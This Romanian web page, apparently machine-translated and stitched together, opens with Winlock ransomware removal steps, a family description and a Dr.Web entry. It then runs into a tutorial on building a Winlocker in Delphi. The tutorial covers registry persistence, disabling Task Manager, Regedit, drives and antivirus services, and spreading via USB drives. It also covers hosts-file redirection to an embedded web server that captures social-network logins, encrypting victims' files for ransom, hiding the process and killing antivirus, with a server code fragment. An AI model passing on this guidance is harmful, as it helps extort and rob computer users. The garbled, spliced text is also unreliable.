###
  • Programe
  • Siguranță
  • Știri
  • Interesant
  • Sfat
  • Știri
  • Recenzii

    • Îndepărtarea virusului troian winlock. Ce trebuie să faceți dacă computerul este blocat, metode de deblocare

    29.11.2020 Știri

    „Oh, exact așa a fost imaginea! Chiar și numărul este același”, următoarea „victimă” aproape cu bucurie „recunosc” virusul.

    Cei care repară calculatoare, ați observat vreodată că, uneori, când vă prezentați, un computer stricat începe brusc să funcționeze de parcă nimic nu s-ar fi întâmplat? Și involuntar cineva se uită la tine cu frică și respect sau chiar glume.

    În acest caz, după descărcare Windows nu era niciun virus, dar m-au sunat acum două zile și în tot acest timp computerul a fost oprit. Unde a plecat?

    Unul dintre sfaturile pentru eliminarea soiurilor de virus Troian.Winlock, solicită: setați ora sistemului în BIOS cu două zile înainte, dacă aceasta nu funcționează, atunci o lună, un an... Acest lucru nu funcționează întotdeauna, la fel ca gratii forjate la ferestre Nu întotdeauna te salvează de tâlhari, dar inspiră încredere (nu am reușit niciodată să scap de un astfel de ransomware), dar aici pare să fi funcționat natural.

    Și totuși eliminați noile trucuri murdare metode mai bune eficient și dovedit. Trebuie spus că serviciile de deblocare care există în prezent pe site-urile companiilor de antivirus nu ajută întotdeauna, iar numeroasele opțiuni pentru eliminarea vicleană... virușii inteligenți nu pot decât să încurce.

    Între timp, printre numeroasele sfaturi se numără două destul de simple, dar moduri eficiente eliminând numeroase Troian.Winlock– viruși care blochează sistemul de operare, făcând imposibilă funcționarea și, în același timp, vă solicită să trimiteți o anumită sumă de bani.

    Voi spune imediat că opțiunile nu sunt ale mele, doar m-am înarmat cu ele, dar să mulțumim worldwar87 pentru utilitatea și adecvarea lor profesională.

    Reinstalarea Windows este ultimul lucru de făcut, deoarece puteți rezolva problema fără a pierde timp și fără prea multe riscuri pentru datele dvs.

    Primul lucru de făcut este să reporniți computerul și, apăsând tasta F8 (uneori F5) în timpul pornirii inițiale, selectați opțiunea: Modul sigur cu suport pentru linia de comandă.

    Clic introduceși luați în considerare situația: primulModul sigur a pornit în siguranță, fără virus, al doileaacesta (virusul) nu a dispărut nicăieri.

    În primul caz, trebuie Linie de comanda comandă de apelare.

    Deschideți ramura de registry folosind calea:

    HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> winlogon

    Să ne uităm Coajă ca in poza:

    Pe calculator curat vei vedea ce ar trebui să fie: scris explorer.exe. Pe cei infectați - calea completă către fisier executabil virus. Amintiți-vă sau scrieți sa fie sters mai tarziu.

    Pentru a face acest lucru, pe linia de comandă scriem explorer.exe iar prin „Computerul meu” ajungem la virus. Șterge.

    În Shell lăsăm doar intrarea explorer.exe

    Pentru a doua situație, când virusul vă împiedică să lucrați în Safe Mode, veți avea nevoie de un Live-CD bootabil cu Windows.

    Va trebui (dacă nu) să îl descărcați de pe Internet. Cred că îl poți găsi - Google te va ajuta.

    Apoi selectați Fișier -> Import (calea C:/WINDOWS/System32/config/software) și deschideți-l în secțiunea creată de noi repetați pașii descrise în primul exemplu.

    După eliminarea virusului, va trebui să ne exportăm ramura curățată înapoi. Pentru a face acest lucru, selectați meniul Fișier -> Exportși înapoi la C:/WINDOWS/System32/config/software.

    După aceasta, reporniți computerul. Virusul a fost eliminat, dar trebuie să îl scanați complet cu un antivirus cu baze de date actualizate: un fel de control și verificare a execuției, la fel ca modulele EMS dintr-un sistem de management al întreprinderii.

    Vanatoare placuta!

    Window Trojan.Winlock 19

    Troian.Winlock (Winlocker) - o familie de programe malware care blochează sau îngreunează lucrul cu acesta sistem de operareși cerând transferul de bani către atacatori pentru a restabili funcționalitatea computerului, un caz special de Ransomware (ransomware). Au apărut pentru prima dată la sfârșitul anului 2007. Virușii ransomware s-au răspândit în iarna 2009-2010; conform unor date, milioane de computere au fost infectate, în principal în rândul utilizatorilor de internet vorbitori de limbă rusă. A doua creștere a activității unui astfel de malware a avut loc în mai 2010.

    Anterior, numerele premium scurte erau de obicei folosite pentru a transfera bani; în prezent, astfel de programe pot necesita și transferul de bani în portofelele electronice (de exemplu, Yandex.Money) sau sold număr de telefon mobil. Necesitatea de a transfera bani se explică adesea prin faptul că „Ați primit un temporar acces liber către un site pentru adulți, trebuie să plătiți pentru continuarea utilizării acestuia” sau că „un produs fără licență a fost detectat pe computerul dvs. copie de Windows" Opțiunea „pentru vizualizarea, copierea și reproducerea videoclipurilor cu abuzuri asupra copiilor și pedofilie” este, de asemenea, posibilă. Modalitățile în care Trojan.Winlock și virușii similari se răspândesc sunt variate; într-o proporție semnificativă de cazuri, infecția are loc prin vulnerabilitățile browserului atunci când vizualizează site-uri infectate sau când escrocii folosesc „pachete” speciale care le permit doar să infecteze calculatoarele necesare de asemenea prin browser.

    Clasificarea diverșilor vânzători

    • Troian.Winlock– conform clasificarii companiei Doctor Web.
    • Troian-Răscumpărare– conform clasificării companiei Kaspersky Lab.
    • Trojan.LockScreen– conform clasificării ESET.

    fundal

    Primul ransomware a apărut în decembrie 1989. Utilizatorii au primit dischete prin poștă cu un program care oferă informații despre SIDA. După instalare, sistemul a devenit inoperabil, iar utilizatorii trebuiau să plătească bani pentru a-l restaura. Primul blocant SMS a fost înregistrat pe 25 octombrie 2007. Ransomware-ul a provocat o prăbușire a sistemului ( ecran albastru de moarte). Controlul sistemului aproape complet blocat.

    Descriere

    Trojan.Winlock, simulând un ecran albastru al morții

    În acest moment, angajații diferitelor companii de antivirus au înregistrat câteva mii de tipuri diferite de Winlockere. Cele mai vechi tipuri au necesitat nu mai mult de 10 ruble pentru deblocare, iar dacă utilizatorul a lăsat computerul pornit o perioadă de timp, s-au autodistrus (de exemplu, Trojan.Winlock 19 în sine a fost șters fără urmă după 2 ore). mai târziu au apărut soiuri mai periculoase care nu au fost șterse singure și au cerut de la 300 la 1000 de ruble pentru deblocare.

    Winlockers se concentrează în primul rând pe utilizatori ruși, au apărut ulterior versiuni străine. Ei folosesc metode de inginerie socială. De obicei, nevoia de a plăti o sumă de bani se explică prin utilizarea unui dispozitiv fără licență software sau vizionarea de filme porno. Trebuie remarcat faptul că, în majoritatea cazurilor, infecția are loc de pe site-uri porno. Destul de des, motivele necesității de a trimite SMS-uri sau metodele de obținere a unui cod sună absurd, de exemplu, „Computerul tău este blocat pentru vizionarea pornografiei cu minori și bestialitate. Pentru a vă debloca computerul, trebuie să reîncărcați soldul telefonului la orice terminal de plată. După plată, codul de deblocare ar trebui să apară pe chitanța de plată.” Greșelile de ortografie nu sunt neobișnuite. Mai mult, aproape toate bannerele conțin un avertisment că o încercare de a înșela „sistemul de plată” va duce la întreruperea computerului sau la distrugerea datelor. Unii dintre ei au chiar și un cronometru încorporat, după care virusul promite să distrugă toate datele utilizatorilor. Cel mai adesea, aceasta este o simplă amenințare care convinge utilizatorul să dea bani atacatorului. Cu toate acestea, unele versiuni vin cu instrumente pentru distrugerea datelor, dar din cauza profesionalismului scăzut al autorilor, a caracteristicilor de instalare sau a altor motive, cel mai adesea nu funcționează corect.

    Infecția poate apărea în timpul lansării programelor mascafate drept instalatorul unor programe de bună credință sau arhive auto-extractabile. În același timp, în „ acord de licențiere” (pe care utilizatorul obișnuit îl citește rar) prevede că utilizatorul este de acord să instaleze pe computer o aplicație „de publicitate”, pe care trebuie să o vizualizeze de un anumit număr de ori, sau să refuze să o vizualizeze prin trimiterea unui SMS. Numărul de vizualizări necesare ajunge de obicei la mii, astfel încât utilizatorii preferă să trimită SMS atacatorului.

    Aspectul „interfeței” troiane este foarte colorat și variat. Dar, în cea mai mare parte, ele sunt unite fie prin similitudine cu meniuri standard Windows sau prezența materialului pornografic (fotografii, mult mai rar animații și videoclipuri, folosind capacitățile Adobe Flash), precum și o fereastră pentru introducerea codului de deblocare. Există soiuri care sunt foarte asemănătoare cu ecranul albastru al morții sau cu fereastra standard Salutări Windows. De asemenea, nu este neobișnuit ca ei să se deghizeze în program antivirus(de exemplu Kaspersky Anti-Virus).

    Trojan.Winlock poate fi împărțit aproximativ în 3 tipuri, în funcție de cât de dificile îngreunează munca utilizatorului:

    • 1 tip- acestea sunt bannere sau informatoare porno care apar doar în fereastra browserului. Tipul cel mai ușor de îndepărtat. De obicei, se prefac a fi pluginuri suplimentare sau suplimente de browser.
    • Tipul 2- acestea sunt bannere care rămân pe desktop după închiderea browserului și în același timp acoperă cea mai mare parte a acestuia. Dar, de obicei, utilizatorii au încă opțiunea de a deschide alte programe, inclusiv Task Manager și Registry Editor.
    • Tip 3- acesta este un tip de bannere care se încarcă după ce lucrătorul este încărcat complet Desktop Windows. Închid aproape întregul desktop, blochează lansarea managerului de activități, a editorului de registry și pornește în modul sigur. Unele soiuri blochează complet tastatura, oferind utilizatorului doar tastele numerice din „interfața” lor și mouse-ul de lucru pentru a introduce codul.

    Ce să faci dacă este infectat cu Trojan.Winlock

    Vezi si

    Note

    Legături

    • AntiWinLocker - LiveCD special pentru eliminarea virusului ransomware
    • Modalități de a combate ransomware-ul din clasa Trojan-Ransom
    Software rău intenționat
    Malware infecțios

    (TROJ_VB.ACD, TR/Dropper.Gen, Trojan.Win32.Sovest.m, BehavesLike:Win32.Malware, Trojan:Win32/Sisproc, Trojan.Agent.JF, KillApp.L, Parser error, Trojan.VB.NID, Generic.cd, Trojan.Win32.Sovest.v, Generic.dx, BackDoor.Generic2.IIE, Trojan:Win32/Bumat!rts, VirTool:Win32/Obfuscator.M, Trojan.Win32.VB.bav, Trojan.Win32. Sovest.g, Backdoor.Pcclient.HR, Troian Horse, Trojan:Win32/Provis!rts, Generic.BPD, TROJ_AGENT.WPQ, Trojan.Win32.Sovest.k, TROJ_AGENT.ABW, Trojan.Agent.VB.AQG)

    Adăugat la baza de date viruși Dr.Web: 2005-09-20

    Descriere adăugată: 2006-01-31

    Tipul de virus: Cal troian

    Sistem de operare vulnerabil: Bazat pe Win NT

    mărimea: 119.296 octeți

    bătătorit: -

    Informații tehnice

    Informații despre recuperarea sistemului

    Trebuie să contactați Serviciul de asistență tehnică Doctor Web pentru a primi instrucțiuni despre cum să restaurați sistemul.

    Windows macOS Linux Android

    1. Dacă sistemul de operare este capabil să pornească (în modul normal sau în modul de protecție împotriva erorilor), descărcați Dr.Web CureIt! și utilizați-l pentru a efectua o scanare completă a computerului dvs., precum și a suportului de stocare portabil pe care îl utilizați.
    2. Dacă sistemul de operare nu poate porni, schimbați setări BIOS computerul pentru a permite computerului să pornească de pe un CD sau o unitate USB. Descărcați imaginea discului de recuperare a sistemului Dr.Web® LiveDisk sau a utilitarului de ardere Dr.Web® LiveDisk pe o unitate USB și pregătiți mediul corespunzător. Prin pornirea computerului folosind a acestui mediu, efectuați o scanare completă și dezinfectați amenințările detectate.
    1. Dacă dispozitivul dvs. mobil funcționează normal, descărcați și instalați produsul antivirus gratuit Dr.Web pentru Android pe acesta Ușoară. Efectuați o scanare completă a sistemului și utilizați recomandări pentru a neutraliza amenințările detectate.
    2. Dacă dispozitivul dvs. mobil este blocat de un troian ransomware din familia Android.Locker (ecranul afișează o acuzație de încălcare a legii, o cerere de plată a unei anumite sume de bani sau un alt mesaj care interferează cu funcționarea normală a dispozitivului) , urmați acești pași:
      • porniți smartphone-ul sau tableta în modul sigur (în funcție de versiunea sistemului de operare și de caracteristicile specifice dispozitiv mobil această procedură poate fi efectuată căi diferite; Pentru clarificări, vă rugăm să consultați instrucțiunile furnizate cu dispozitivul achiziționat sau direct la producătorul acestuia);
      • După activarea modului sigur, instalați un produs antivirus gratuit pe dispozitivul infectat

    Nu este un secret că mulți utilizatori sunt atât de departe tehnologia Informatiei că le permite să lucreze cu un dispozitiv atât de complex precum un computer este încărcat. Dar cum se organizează restricția de acces la un computer? La urma urmei, astăzi oricine are cel puțin 10% din brațele crescând din umeri poate porni un computer. Din fericire, există o întreagă clasă de programe care ajută la limitarea accesului utilizatorilor la diferite componente ale sistemului de operare: de la o simplă interdicție de a juca Klondike sau Minesweeper, la blocare completă Windows.

    Cum apare infecția?

    Cu toate acestea, nu toți utilizatorii sunt de acord blocare voluntară sistemul dumneavoastră (vreau să vă concentrez atenția asupra faptului că în acest articol nu vom lua în considerare crearea de malware). Așadar, adesea un astfel de software este livrat mașinilor lor sub forma unui virus. Există foarte multe modalități de a infecta o victimă. Printre acestea, cele mai populare sunt:

    1. ERRORE DE BROWSER. Nu este un secret pentru nimeni că unul dintre scopurile unui scriitor modern de viruși este browserul utilizatorului. Serviciile web utile sunt de un ban pe duzină, iar utilizatorii, desigur, le folosesc. Pentru mulți, browserul este cel mai des folosit program, care se închide foarte rar (nu se închide deloc pentru mine).

    Nu este nevoie să mergi la un ghicitor în căutarea unui răspuns la întrebarea „prin ce ușă este cel mai bine să spargi în sistemul utilizatorului?” Aici este deja clar: este necesară exploatarea vulnerabilităților celor mai populare browsere. Pentru a aplica această metodă, nu este nevoie să ai inteligență specială. Este suficient să răsfoiți site-urile de securitate, să găsiți (dacă există unul) un strat potrivit și să îl proiectați frumos pentru nevoile dvs. Rapid, ușor și gratuit.

    2. FLASH. Adobe a încurcat regulat în ultimele luni. Nu vor avea timp să elibereze versiune noua flash player, cum reușesc hackerii să descopere o vulnerabilitate critică în el. Ei le găsesc, împing nasul dezvoltatorilor, dar nu se grăbesc să le corecteze.
    Este o prostie să crezi că, în același timp, virușii vor sta în liniște la al cincilea punct și vor aștepta ca bug-ul să fie remediat. Ei încearcă în mod constant să profite de o nouă vulnerabilitate și să profite maxim de ea. Drept urmare, se dovedește că, după ce vizionați un videoclip amuzant, sistemul începe să se comporte ciudat.

    3. NAIVITATEA UTILIZATORULUI. Când am început să pregătesc acest articol, de dragul experimentului, am încărcat sistemul de operare în mașină virtualăși a încercat să hoinărească prin site-uri „dubioase”. Nu o să crezi, dar am reușit să iau Winlocker de trei ori, fiind de acord să instalez „ ultima versiune» flash player și codecuri „speciale”. Sincer să fiu, am fost puțin șocată, pentru că am crezut că astfel de metode nu mai funcționează.

    Pe ce vom codifica?

    M-am gândit mult timp la ce limbă să scriu exemplele pentru acest articol și am decis să-mi amintesc Delphi-ul testat în timp. „Deci exe-ul tău va fi de aproximativ un megaoctet!”, obiectezi. Sunteți parțial adevărat, dar vom rezolva această problemă în faza de concepție a proiectului. Tot codul va fi furnizat în API pur. În consecință, animalul nostru în formă compilată va cântări mai puțin de 100 KB. Vom pierde încă câteva zeci de kilograme prin manipularea arhivatorului bytecode pe binarul rezultat.

    Baza oricărui Winlocker

    Fundamentul oricărui Winlocker este o formă întinsă aproape pe întregul ecran. Mai mult, aceasta nu este doar o formă mare, ci o fereastră care se suprapune pe toate celelalte și nu ascultă deloc nicio comandă. Nici minimizați, nici redimensionați, cu atât mai puțin închideți procesul programului. La prima vedere, poate părea că scriitorii de viruși au inventat know-how, dar în realitate totul este mult mai simplu. De fapt, aceasta este cea mai obișnuită fereastră, pentru care stilul de afișare este setat la „pe deasupra tuturor”. Pentru ca fereastra să se comporte ca o gherilă și să nu răspundă la solicitările utilizatorilor, dezvoltatorii modifică ușor procedura de procesare a mesajelor din exterior.

    Modificarea se reduce la procesarea banală a mesajului WM_SYSCOMMAND. Pentru a fi și mai precis, în procedura de procesare a mesajelor primite trebuie doar să declarați o verificare pentru mesajul WM_SYSCOMMAND. Lucrul amuzant este că, în procesarea acestui mesaj, nu trebuie să scrieți deloc cod - formularul nu va mai răspunde la evenimentele din mediul extern.

    Pornire automată

    Virusul trebuie încărcat împreună cu sistemul de operare. Există mai multe moduri de a vă asigura că programul dvs. se încarcă automat. În mod convențional, acestea pot fi împărțite în două grupe: simple și avansate. Nu există suficient spațiu în articol pentru a le lua în considerare pe cele avansate, așa că le vom lua în considerare doar pe cele simple pe baza utilizării registrului. Deci, există mai multe colțuri de pornire automată în registru:

    1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run - programele care sunt lansate atunci când orice utilizator se conectează încep de aici.
    2. HKCU\Software\Microsoft\Windows\Current\Version\Run - o locație similară cu cea anterioară, cu excepția faptului că programele utilizatorului actual sunt încărcate de aici.
    3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - listă de programe care sunt lansate înainte ca utilizatorii să se autentifice.
    4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run - această secțiune de registry este responsabilă pentru pornirea programelor adăugate la pornire prin politicile de grup.
    5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows este o altă locație care conține o listă de programe care vin cu Windows.
    6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - această ramură conține un link către Winlogon, dar nimic nu vă împiedică să specificați calea către programul dvs.
    7. Dosarul de pornire. Poate cea mai primitivă metodă, dar cu toate acestea, mulți scriitori de viruși o folosesc.

    Pe care dintre locațiile de pornire sugerate ar trebui să alegi pentru creația ta? Nu există un răspuns exact, dar nu este recomandat să pariezi totul pe oricare dintre opțiunile propuse. Este mult mai bine să folosiți o combinație, adică să vă înregistrați în mai multe locuri deodată. Un exemplu de scriere la autoload pe WinAPI este dat în a doua casetă.

    Te blocam si ma blocam pe mine!

    De exemplu, puteți desemna cu ușurință un program care se va lansa după pornirea sistemului sau poate bloca pornirea unei anumite aplicații. Aproape toate operațiunile care sunt efectuate prin acest snap-in modifică anumite chei de registry. Dacă reușiți să aflați ce chei de registry sunt modificate, le puteți modifica cu ușurință direct din programul dvs. Cum să o facă? Există două opțiuni: folosiți metoda științifică poke sau utilizați utilitarul ProcessMonitor de la Mark Russinovich. A doua metodă este în mod clar mai rece, așa că vă sfătuim să descărcați utilitarul și să începeți cercetarea.

    Editorul Registrului

    Majoritatea utilizatorilor sunt obișnuiți să editeze registry folosind sistemul încorporat Editor Windows registrul regedit. Deoarece virusul nostru va face modificări în registry, trebuie să împiedicăm un utilizator neglijent să modifice registrul. N-are rost să-și bage nasul curios unde nu ar trebui. Cel mai simplu mod de a rezolva această problemă este blocarea lansării Editorului de registru. Pentru a bloca, trebuie doar să creați cheia DisableRegistryTools cu valoarea 1 în ramura HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.

    Gestionar de sarcini

    Fără excepție, toate winlockerele pe care le-am văzut au blocat lansarea managerului de activități. Ei bine, să nu rămânem în urma lor. Această caracteristică este implementată prin crearea cheii DisableTaskMgr (tip dword) cu valoarea 1 în aceeași ramură cu DisableRegistryTools.

    Instalare si demontare de programe

    Utilizatorii deosebit de inteligenți folosesc aplicația „Adăugați sau eliminați programe” pentru a încerca să instaleze antivirusuri în cazul unei infecții a sistemului. Acest lucru poate fi oprit cu ușurință prin crearea cheii NoAddRemovePrograms cu o valoare de 1 (tip dword), toate în aceeași secțiune ca DisableRegistryTools.

    Blocarea accesului la discuri

    Pentru a distruge complet starea de spirit a utilizatorului, puteți bloca complet accesul la discurile prezente în sistem. Lăsați utilizatorul să nu încerce nici măcar să ruleze antivirusul de pe unitatea sa flash! Să implementăm acest truc creând o cheie NoViewOnDrive (dword) în secțiunea HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. Ca valoare pentru cheie, specificăm masca de biți a discului care trebuie blocat. De exemplu, pentru unitatea C va fi 4. Dacă trebuie să blocați mai multe unități, măștile acestora vor trebui adăugate împreună. De exemplu, o valoare de 12 ar corespunde blocării unităților C (4) și D (8).

    Sfatul #1: este mai distractiv împreună oriunde

    Ați infectat computerul unui utilizator sărac? Nu uita să ai grijă de prietenii lui! Amintiți-vă, cu cât virusul se răspândește mai larg, cu atât sunt mai mari șansele de a obține bani. După ce ați stabilit un vehicul inamic, nu ar trebui să pierdeți timpul, ci să încercați să găsiți un nou cap de pod. Cum să o facă? Una dintre cele mai simple și cele mai multe moduri eficiente- monitorizarea și infectarea unităților flash. Deoarece utilizatorii folosesc în mod constant unități flash, va fi ușor pentru virusul nostru să migreze de la un sistem la altul. Este ușor să determinați dacă o unitate flash este conectată. Este suficient să scrieți cod care procesează evenimentul WM_DEVICECHANGE.

    În codul din a treia casetă, am folosit constante și structuri care nu sunt descrise în modulele care vin cu Delphi. Va trebui să le descrii singur. Am luat toate informațiile de la MSDN, dar nu trebuie să vă faceți griji pentru asta și să obțineți doar sursa codului meu pe DVD.

    Sfat #2: permisele tale vor fi ale noastre!

    Ce servicii web folosește un utilizator modern? Nu trebuie să fii un expert în rachete pentru a numi cel puțin câțiva dintre ei: mail, Odnoklassniki, VKontakte, facebook, twitter etc. Lista continuă și continuă. La ce ajung? Și în plus, fiind pe teritoriul inamicului, ar fi bine să strângi toate parolele. Poate că vor fi de folos în viitor. În plus, având astfel de atuuri în mână, devine posibilă stimularea victimei. De exemplu, după ce a primit parole de la diferite conturi, autorul virusului le poate folosi pentru a schimba informațiile de contact și pentru a schimba parolele cu propriile sale. Ca urmare utilizator real va ajunge într-o situație foarte proastă. Pur și simplu, își pierde contul. Acest lucru este deja mult mai grav decât un desktop blocat și, dacă da, atunci șansele de plată pentru „serviciile” tale cresc.

    Apare imediat întrebarea, care este cel mai simplu mod de a face acest lucru? De obicei, utilizatorii își stochează parolele direct în browser, așa că imediat apare ideea de a fura fișierul de stocare a parolei. Un exemplu de astfel de furt a fost demonstrat în articolul „Evil Computer”. O să-ți arăt cale alternativă. Ideea este să modifici pur și simplu gazdele. Acest fișier conține potriviri de tipul „adresă site simbolică: ip”. Programul nostru ar trebui să poată modifica acest fișier și să adauge corespondență pentru serviciile web populare. „Unde vom transfera utilizatorul?” Pentru a face acest lucru, vă puteți crea propriul site web rău, pe care vor fi localizate escrocherii de la serviciile populare. Această metodă este ușor de implementat, dar dacă utilizatorii sunt infectați masiv, astfel de site-uri probabil nu vor supraviețui mult timp. În acest sens, vom abandona metoda propusă și vom merge pe o cale nu în totalitate standard - vom construi un mic server web în virus. În această situație, destinația noastră de redirecționare va fi localhost.

    De exemplu: 127.0.0.1 www.odnoclassniki.ru

    Examinați editarea fișier hosts Nu o vom face, este mai bine să aruncăm o privire imediat la cum să vă configurați serverul WEB folosind Delphi. Dacă sunteți un cititor obișnuit al revistei noastre, ar trebui să cunoașteți bine API-ul Winsock. La un moment dat, în secțiunea Codare existau articole despre scrierea a tot felul de clienți (FTP, PROXY, IRC etc.) folosind doar o funcție api. Vă recomand să ridicați liantul și să vă familiarizați temeinic cu subiectul subiectului (ulei - nota editorului).

    Acum, în loc de Odnoklassniki.ru, victima nu va ajunge pe site-ul real al popularului rețea socialăși direct în ghearele serverului nostru rău. Desigur, serverul web trebuie să fie politicos și să afișeze pagina reală a colegilor de clasă (a se citi - un site de înșelătorie, trebuie pregătit în prealabil). Ei bine, atunci totul este simplu: utilizatorul își introduce informațiile de conectare, după care serverul nostru web le salvează. Pentru a nu fi pârjolit în mod deschis, este indicat să redirecționați către o pagină cu avertisment că site-ul este în acest momentînchis pentru lucrări de întreținere. Sau, opțional, salvați și redirecționați datele introduse către colegii reali.

    Trucul #3: extaz pentru utilizator

    Cum încurajează programatorii răi utilizatorii să se despartă de SMS-urile plătite cu greu? Diferit. De exemplu, criptarea fișierelor care sunt valoroase pentru el. La ce fișiere ar trebui să fiu atent? Cel mai bine este să le folosiți pe acelea de care poate depinde munca/studiul victimei, de exemplu: documente (doc, xls, mdb, ppt, txt), imagini (jpeg, png, bmp), textele sursă(php, pas, c, h, cpp, dpr, py etc.). Dacă victima scria o teză sau un raport extrem de important care urmează să fie programat mâine, atunci atacatorul are toate șansele să primească o recompensă în bani.

    Acum să vorbim despre implementarea tehnică a acestui lucru. Găsirea fișierelor se face cu funcțiile FindFirs() și FindNext() din modulul Sysutils. Este ușor să lucrați cu ei, dar simplitatea unui astfel de fast-food va afecta negativ figura aplicației noastre. Deoarece nu trebuie să luăm în greutate în exces, vom folosi mai multe produse dietetice: FindFirstFile() și FindNextFile(). Lucrul cu ei este puțin mai dificil (vezi exemplul de căutare a fișierelor pe disc), dar frumusețea necesită sacrificii.

    Criptarea fișierelor folosind Delphi este, de asemenea, destul de simplă. Totul depinde de metoda de criptare aleasă. Puteți folosi pur și simplu module gata făcute, care sunt un ban pe duzină pe torry.net și alte site-uri. De exemplu, am dat peste o opțiune bună de la unul dintre dezvoltatorii Delphi. Acest modul implementează următoarele funcții:

    //Criptarea fișierelor
    funcția FileEncrypt(InFile, OutFile: String;
    Cheie: TWordTriple): boolean;
    //Decriptarea fișierelor
    funcția FileDecrypt(InFile, OutFile: String;
    Cheie: TWordTriple): boolean;
    //Criptarea textului
    funcția TextEncrypt(const s: șir;
    Cheie: TWordTriple): șir;
    //Decriptarea textului
    funcția TextDecrypt(const s: șir;
    Cheie: TWordTriple): șir;
    //Criptarea „memoriei”
    funcția MemoryEncrypt(Src: Pointer; SrcSize:
    Cardinal;
    Țintă: Pointer; TargetSize: Cardinal;
    Cheie: TWordTriple): boolean;
    //Decriptarea „memoriei”
    funcția MemoryDecrypt(Src: Pointer;
    SrcSize: Cardinal; Țintă: Pointer;
    TargetSize: Cardinal; Cheie: TWordTriple): boolean;

    Textul integral al acestor funcții, precum și exemple de utilizare a acestora, pot fi găsite pe discul nostru.

    Sfatul #4: înmulțiți!

    Sfatul #5: Joacă-ți ascunselea la maximum

    După cum a arătat practica, autorilor Winlockers nu le pasă prea mult de siguranța creațiilor lor. Protecția celor mai mulți reprezentanți ai acestui grup de viruși care mi-au dat peste ochi s-a rezumat la atribuirea banală a unui nume de fișier discret. De exemplu: system.exe, user32.exe, csrss.exe, eplorer.exe și așa mai departe. Nu credeam că astfel de metode sunt încă în uz, dar după cum s-a dovedit, m-am înșelat.
    Vă recomand să nu neglijați securitatea, ci să luați în considerare mai mulți algoritmi diferiți:

    1. Dați fișierului virusului un nume discret. Deși aceasta este o regulă primitivă, este foarte recomandabil să o respectați.
    2. Eliminați virusul din lista de procese. Acest lucru poate fi realizat prin înțelegerea interceptării funcției API. Am scris deja de multe ori despre interceptarea API. Asigurați-vă că recitiți aceste articole!
    3. Utilizați mai multe metode de încărcare automată.

    Trucul #6: ucide la început

    Nu fi leneș și scrie o procedură pentru a forța procesele să se termine. Cu siguranță vă va ajuta să vă protejați creația de antivirusurile malefice pe care utilizatorul va încerca să le ruleze. Ideal este să interceptați, în general, funcțiile folosite pentru a lansa programe și să le împiedicați să funcționeze normal.

    Lucrare finalizată

    A scrie WinLocker și a câștiga câteva sute de dolari cu el este mai mult decât posibil. Utilizatorii încă nu se gândesc la securitate și, dacă apare o situație sensibilă, sunt gata să trimită SMS-ul prețuit, mai degrabă decât să-și obosească creierul. Ți-am arătat cel mai primitiv schelet al lui Winlocker. În principiu, aducerea lui în stare de luptă este o chestiune de câteva ore. Dar este necesar să faci asta? Alegerea este a ta! Principalul lucru este să nu uitați că scrierea și distribuirea de viruși este o infracțiune penală pentru care puteți obține o pedeapsă reală cu închisoarea. Desigur, nu vă voi da codul sursă pentru virusul complet. Nu, nu pentru că sunt lacom. Acești viruși deja enervează pe toată lumea, așa că sunt sigur că nu vreau să fie și mai mulți după acest articol. În plus, nu vreau să citesc știri despre modul în care agențiile de aplicare a legii i-au reținut pe cei mai recenti creatori de viruși teribili :).

    Server web de casă

    var
    _buff: matrice de caractere;
    _cerere:șir;
    _temp: șir;
    _cale: șir;
    _FileStream: TFileStream;
    ÎNCEPE
    Recv(_client, _buff, 1024, 0);
    _request:=string(_buff);
    _path:= GetFilePath(Copy
    (_cerere, 1, pos(#13, _cerere)));
    _path:= ReplaceSlash(_path);
    dacă ((_path = "") sau (_path = "\")) Atunci
    _path:= DocumentRoot + „\” + DirectoryIndex;
    (altfel
    if ((_path = "\")) Atunci
    _path:= DocumentRoot + „\” +
    DirectoryIndex; )
    if (FileExists(_Path)) Atunci
    ÎNCEPE
    _FileStream:=
    TFileStream.Create(_Path, fmOpenRead);
    SendStr(_Client, "HTTP/1.0 200 OK");
    SendStr(_Client, "Server: xSrV");
    SendStr(_Client, „Lungimea conținutului:” +
    IntToStr(_FileStream.Size));
    SendStr(_Client, "Tip de conținut: "
    + GetTypeContent(_Path));
    SendStr(_Client, „Conexiune: închidere”);
    SendStr(_Client, "");
    SendFile(_Client, _FileStream);
    _FileStream.Free;
    Sfârşit
    //Elimina

    Limitarea lansării aplicațiilor

    Folosind registrul, este posibilă determinarea listei de programe aprobate pentru lansare. Dacă această listă este specificată, utilizatorul nu va putea lansa aplicații care nu sunt în ea. Lista aplicațiilor aprobate pentru lansare este setată aici: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\RistrictRun. După ce ați creat cheile în această secțiune (tip REG_SZ) pentru fiecare program permis, va trebui să urcați cu un nivel și să adăugați parametrul RestrictRun de tip dword cu o valoare de 1.

    Managementul calculatorului

    Un utilizator poate face o mulțime de lucruri rele dacă are acces pentru a lansa snap-in Managementul computerului. Nu puteți dezactiva complet snap-in-ul folosind registry, dar puteți elimina linkul pentru a-l lansa din meniul contextual comanda rapidă „Computerul meu” este simplă. Tot ce trebuie să faceți este să creați un parametru NoManageMyComputerVerb de tip dword cu o valoare de 1 în secțiunea HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.

    Oprim serviciile

    Folosind capacitățile registrului, puteți dezactiva cu ușurință serviciile de care utilizatorul nu are nevoie (de exemplu, antivirusuri). Lista plina serviciile instalate pe sistem se află în filiala HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services. Pentru a dezactiva serviciul, editați valoarea tastei de pornire. De exemplu, pentru a seta serviciul „Tip de pornire” la „manual”, tasta de pornire trebuie setată la 3. Dacă doriți ca software-ul dvs. să reziste mai mult într-un sistem inamic, atunci vă sfătuiesc să mențineți o bază de date cu servicii antivirus în creația ta. Adică, trebuie să identificați în mod clar serviciile antivirus și să le schimbați tipul de pornire.

    Ce altceva mai avem nevoie?

